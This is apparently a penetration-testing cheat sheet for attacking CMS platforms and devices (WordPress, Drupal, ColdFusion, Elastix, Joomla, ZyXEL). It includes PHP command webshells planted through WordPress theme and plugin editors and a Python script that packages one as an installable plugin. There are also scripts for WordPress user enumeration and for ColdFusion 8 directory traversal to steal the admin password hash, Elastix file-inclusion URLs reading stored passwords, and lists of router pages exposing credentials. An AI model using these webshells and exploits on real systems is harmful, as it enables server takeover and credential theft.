
CMS

  • Enumerate the version and other details (admin paths, config files, installed plugins/themes)
  • Search for known vulnerabilities for that exact version (exploit-db, CVE databases)

WordPress

Admin pages

/wp-admin
/wp-login.php

Config files

/wp-admin/setup-config.php (the installer; only interesting if the install was never completed)
/wp-config.php (DB credentials and salts; also try leftover copies such as wp-config.php.bak)

Find users

/?author=1, /?author=2, ... (an existing ID redirects to /author/<username>/, which leaks the login name)
/wp-json/wp/v2/users (REST API user listing, if not disabled)
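The author-ID walk described above, as an added example that is not part of the original notes. It recognises both ways WordPress leaks the slug (the 301 Location header with pretty permalinks, and the author-<nicename> class on the archive page's body tag). The fetcher is injected so the parsing can be checked offline against the constructed responses embedded below; the hostname wp.test and the sample users admin and jdoe are assumptions.

```python
"""WordPress user enumeration via /?author=N (added example; not from the original notes)."""
import re
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional, Tuple

# (status, headers, body)
Response = Tuple[int, Dict[str, str], str]
Fetcher = Callable[[str], Response]

LOCATION_RE = re.compile(r"/author/([^/?#]+)/?", re.I)
BODY_CLASS_RE = re.compile(r'<body[^>]*\bclass="([^"]*)"', re.I)


def extract_author_slug(resp: Response) -> Optional[str]:
    """Pull the author slug from a redirect Location or from the archive page's body classes."""
    status, headers, body = resp
    lowered = {k.lower(): v for k, v in headers.items()}
    m = LOCATION_RE.search(lowered.get("location", ""))
    if m:
        return m.group(1)
    m = BODY_CLASS_RE.search(body)
    if m:
        # body_class() emits author-<nicename> and author-<ID>; keep the non-numeric one.
        for cls in m.group(1).split():
            if cls.startswith("author-") and not cls[7:].isdigit():
                return cls[7:]
    return None


def enumerate_authors(base_url: str, fetch: Fetcher, max_id: int = 25,
                      stop_after_misses: int = 5) -> Dict[int, str]:
    """Walk author IDs 1..max_id, stopping after a run of consecutive misses (deleted IDs leave gaps)."""
    found: Dict[int, str] = {}
    misses = 0
    for author_id in range(1, max_id + 1):
        slug = extract_author_slug(fetch(f"{base_url.rstrip('/')}/?author={author_id}"))
        if slug:
            found[author_id] = slug
            misses = 0
        else:
            misses += 1
            if misses >= stop_after_misses:
                break
    return found


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):
        return None  # do not follow the 301, so its Location header can be read


def http_fetch(url: str) -> Response:
    """Live fetcher: GET without following redirects."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=10) as r:
            return r.status, dict(r.headers), r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, dict(e.headers), e.read().decode("utf-8", "replace")


# Constructed responses standing in for a target (assumption); not captured from any real site.
FAKE_RESPONSES: Dict[str, Response] = {
    "http://wp.test/?author=1": (301, {"Location": "http://wp.test/author/admin/"}, ""),
    "http://wp.test/?author=2": (200, {}, '<html><body class="archive author author-jdoe author-2">'),
}


def fake_fetch(url: str) -> Response:
    return FAKE_RESPONSES.get(url, (404, {}, '<html><body class="error404">'))


if __name__ == "__main__":
    # With a URL argument the script runs against that site; without one it uses the constructed data.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://wp.test"
    fetch = http_fetch if len(sys.argv) > 1 else fake_fetch
    for uid, slug in sorted(enumerate_authors(target, fetch).items()):
        print(f"{uid}\t{slug}")
```

The consecutive-miss cutoff matters on real sites: user IDs are not contiguous once accounts have been deleted, so stopping at the first 404 would miss later users.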

Upload a shell via a WP theme

  1. Log in to wp-admin and go to Appearance
  2. Open the Theme Editor and pick a theme file you are allowed to edit, e.g. 404.php (the editor is absent if DISALLOW_FILE_EDIT is set in wp-config.php)
  3. Put the webshell into the theme file
<?php
// Minimal command webshell: runs the value of the cmd query parameter on the server
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
  4. Update the file and browse to <url>/wordpress/wp-content/themes/twentyfifteen/404.php?cmd=id (replace twentyfifteen with the theme you edited)

Upload a shell via a WP plugin

  1. Log in to wp-admin and go to Plugins
  2. Add a new plugin from a zip file, or edit an existing plugin's .php file (the file must start with the plugin header comment, otherwise WordPress will not list it)
<?php
/*
Plugin Name: Malicious Plugin
Description: A simple plugin for demonstration.
Version: 1.0
Author: Test
*/
// Minimal command webshell: runs the value of the cmd query parameter on the server
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>

  3. Browse to <url>/wp-content/plugins/malicious_plugin/plugin_cmd.php?cmd=id (the directory and file names follow what you uploaded; the plugin does not need to be activated, since the file is requested directly and uses no WordPress functions)
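Packaging the plugin webshell above into a zip that the Plugins > Add New upload accepts, as an added example that is not part of the original notes. It encodes the two details that decide whether the upload works and where the shell lands: WordPress only lists a plugin whose main .php file has a "Plugin Name:" header within the first 8 KB it reads, and when the zip contains a single top-level directory, that directory name is kept under wp-content/plugins/. The directory name malicious_plugin, the file name plugin_cmd.php and the host wp.test are assumptions.

```python
"""Build a WordPress-installable plugin zip carrying the command webshell (added example)."""
import io
import re
import sys
import zipfile
from typing import List, Optional
from urllib.parse import quote

PLUGIN_DIR = "malicious_plugin"   # assumption: becomes wp-content/plugins/<PLUGIN_DIR>/
PLUGIN_FILE = "plugin_cmd.php"    # assumption: main plugin file inside that directory
PLUGIN_PHP = """<?php
/*
Plugin Name: Malicious Plugin
Description: A simple plugin for demonstration.
Version: 1.0
Author: Test
*/
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
"""

# Same shape as the header line WordPress's get_file_data() looks for.
HEADER_RE = re.compile(r"^[ \t/*#@]*Plugin Name:\s*(.+)$", re.M)


def plugin_name(php: str) -> Optional[str]:
    """Mirror WordPress's header parse: only the first 8 KB of the file are inspected."""
    m = HEADER_RE.search(php[:8192])
    return m.group(1).strip() if m else None


def build_plugin_zip(php: str = PLUGIN_PHP, plugin_dir: str = PLUGIN_DIR,
                     plugin_file: str = PLUGIN_FILE) -> bytes:
    """Return the zip bytes; refuse to package a file WordPress would not recognise as a plugin."""
    if plugin_name(php) is None:
        raise ValueError("missing 'Plugin Name:' header; WordPress would not list the plugin")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # One top-level directory, so WordPress keeps its name as the plugin directory.
        zf.writestr(f"{plugin_dir}/{plugin_file}", php)
    return buf.getvalue()


def zip_entries(data: bytes) -> List[str]:
    return zipfile.ZipFile(io.BytesIO(data)).namelist()


def shell_url(base_url: str, plugin_dir: str = PLUGIN_DIR, plugin_file: str = PLUGIN_FILE,
              cmd: str = "id") -> str:
    """Where the shell answers once the zip is installed (URL-encodes the command)."""
    return f"{base_url.rstrip('/')}/wp-content/plugins/{plugin_dir}/{plugin_file}?cmd={quote(cmd)}"


if __name__ == "__main__":
    out = sys.argv[1] if len(sys.argv) > 1 else f"{PLUGIN_DIR}.zip"
    with open(out, "wb") as f:
        f.write(build_plugin_zip())
    print(f"wrote {out}; after install try {shell_url('http://wp.test')}")
```

Upload the resulting zip through Plugins > Add New > Upload Plugin; the install step only unpacks it, so the shell is reachable immediately at the URL the script prints.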

Drupal

Droopescan

droopescan scan drupal -u http://example.org/ -t 32

Find version

/CHANGELOG.txt

Adobe ColdFusion

Determine version

/CFIDE/adminapi/base.cfc?wsdl (the generated WSDL names the ColdFusion version in a comment at the top)

Version 8 vulnerabilities

  • FCKeditor: the bundled FCKeditor connector allows arbitrary file upload (CVE-2009-2265)

  • LFI: directory traversal in the locale parameter of enter.cfm (CVE-2010-2861); the example below reads password.properties, which holds the SHA-1 hash of the administrator password

    http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
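The version check and the password.properties read above, chained into one flow, as an added example that is not part of the original notes. Assumptions: the WSDL version comment has the form "WSDL created by ColdFusion version 8,0,1,195765"; the install directory is ColdFusion8 as in the URL above (other versions install elsewhere, so the traversal is only attempted when the major version is 8); and the file contains a line password=<40 hex characters>. The fetcher is injected so the flow runs offline against the constructed responses embedded below; the host cf.test is an assumption.

```python
"""ColdFusion fingerprint plus CF8 admin-hash retrieval via the enter.cfm locale traversal (added example)."""
import re
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional, Tuple

Response = Tuple[int, str]          # (status, body)
Fetcher = Callable[[str], Response]

WSDL_PATH = "/CFIDE/adminapi/base.cfc?wsdl"
# Assumed comment format at the top of the generated WSDL.
VERSION_RE = re.compile(r"ColdFusion version (\d+),(\d+),(\d+),(\d+)", re.I)
# Traversal from the notes; %00 truncates the locale suffix ColdFusion appends after the path.
LFI_PATH = ("/CFIDE/administrator/enter.cfm?locale="
            "../../../../../../../../../../ColdFusion8/lib/password.properties%00en")
# Match 'password=<sha1 hex>' but not the 'rdspassword=' line that precedes it.
PASSWORD_RE = re.compile(r"(?<![A-Za-z])password=([0-9A-Fa-f]{40})")


def coldfusion_version(base_url: str, fetch: Fetcher) -> Optional[Tuple[int, ...]]:
    status, body = fetch(base_url.rstrip("/") + WSDL_PATH)
    m = VERSION_RE.search(body) if status == 200 else None
    return tuple(int(x) for x in m.groups()) if m else None


def cf8_admin_hash(base_url: str, fetch: Fetcher) -> Optional[str]:
    """Read password.properties through the traversal and return the admin password's SHA-1."""
    status, body = fetch(base_url.rstrip("/") + LFI_PATH)
    m = PASSWORD_RE.search(body) if status == 200 else None
    return m.group(1).upper() if m else None


def assess(base_url: str, fetch: Fetcher) -> Dict[str, object]:
    """Fingerprint first; only try the ColdFusion8 path when the major version is 8."""
    version = coldfusion_version(base_url, fetch)
    result: Dict[str, object] = {"version": version, "admin_hash": None}
    if version and version[0] == 8:
        result["admin_hash"] = cf8_admin_hash(base_url, fetch)
    return result


def http_fetch(url: str) -> Response:
    """Live fetcher; HTTP errors are returned as (status, body) rather than raised."""
    try:
        with urllib.request.urlopen(url, timeout=10) as r:
            return r.status, r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


# Constructed responses (assumption; not captured from a real host). The hash is SHA-1("password").
FAKE_RESPONSES: Dict[str, Response] = {
    "http://cf.test" + WSDL_PATH: (
        200, "<!--WSDL created by ColdFusion version 8,0,1,195765-->\n<wsdl:definitions></wsdl:definitions>"),
    "http://cf.test" + LFI_PATH: (
        200, "<html>\n#Fri Jan 01 00:00:00 UTC 2010\nrdspassword=\n"
             "password=5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8\nencrypted=true\n</html>"),
}


def fake_fetch(url: str) -> Response:
    return FAKE_RESPONSES.get(url, (404, ""))


if __name__ == "__main__":
    # With a URL argument the script runs against that host; without one it uses the constructed data.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://cf.test"
    print(assess(target, http_fetch if len(sys.argv) > 1 else fake_fetch))
```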

Elastix

  • Google the vulnerabilities for the exact version
  • default login for vtigercrm (at /vtigercrm/) is admin:admin
  • a shell can be uploaded as the profile photo

2.2.0 - 'graph.php' Local File Inclusion

http://server/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Note: /etc/amportal.conf holds the Asterisk and MySQL passwords (e.g. AMPDBPASS, AMPMGRPASS); most probably the same password is reused for root, so try it directly over SSH.

Joomla

  • Admin page - /administrator
  • Configuration files
      configuration.php
      diagnostics.php
      joomla.inc.php
      config.inc.php

Mambo

Config files

configuration.php
config.inc.php

ZyXEL

Configuration files

/WAN.html (contains PPPoE ISP password) 
/WLAN_General.html and /WLAN.html (contains WEP key)
/rpDyDNS.html (contains DDNS credentials)
/Firewall_DefPolicy.html (Firewall)
/CF_Keyword.html (Content Filter)
/RemMagWWW.html (Remote MGMT)
/rpSysAdmin.html (System)
/LAN_IP.html (LAN)
/NAT_General.html (NAT)
/ViewLog.html (Logs)
/rpFWUpload.html (Tools)
/DiagGeneral.html (Diagnostic)
/RemMagSNMP.html (SNMP Passwords)
/LAN_ClientList.html (Current DHCP Leases)

# Config Backups
/RestoreCfg.html
/BackupCfg.html